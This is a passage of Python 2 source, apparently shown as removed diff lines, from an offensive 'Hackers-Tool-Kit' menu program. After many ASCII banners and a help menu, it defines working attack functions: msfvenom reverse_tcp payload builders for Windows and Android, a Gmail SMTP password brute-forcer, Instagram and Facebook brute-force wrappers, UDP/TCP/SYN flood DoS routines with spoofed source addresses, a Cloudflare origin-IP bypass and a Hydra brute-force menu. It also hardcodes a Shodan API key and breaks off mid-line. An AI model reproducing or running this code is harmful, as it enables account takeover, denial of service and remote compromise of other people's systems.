- ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,16) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = 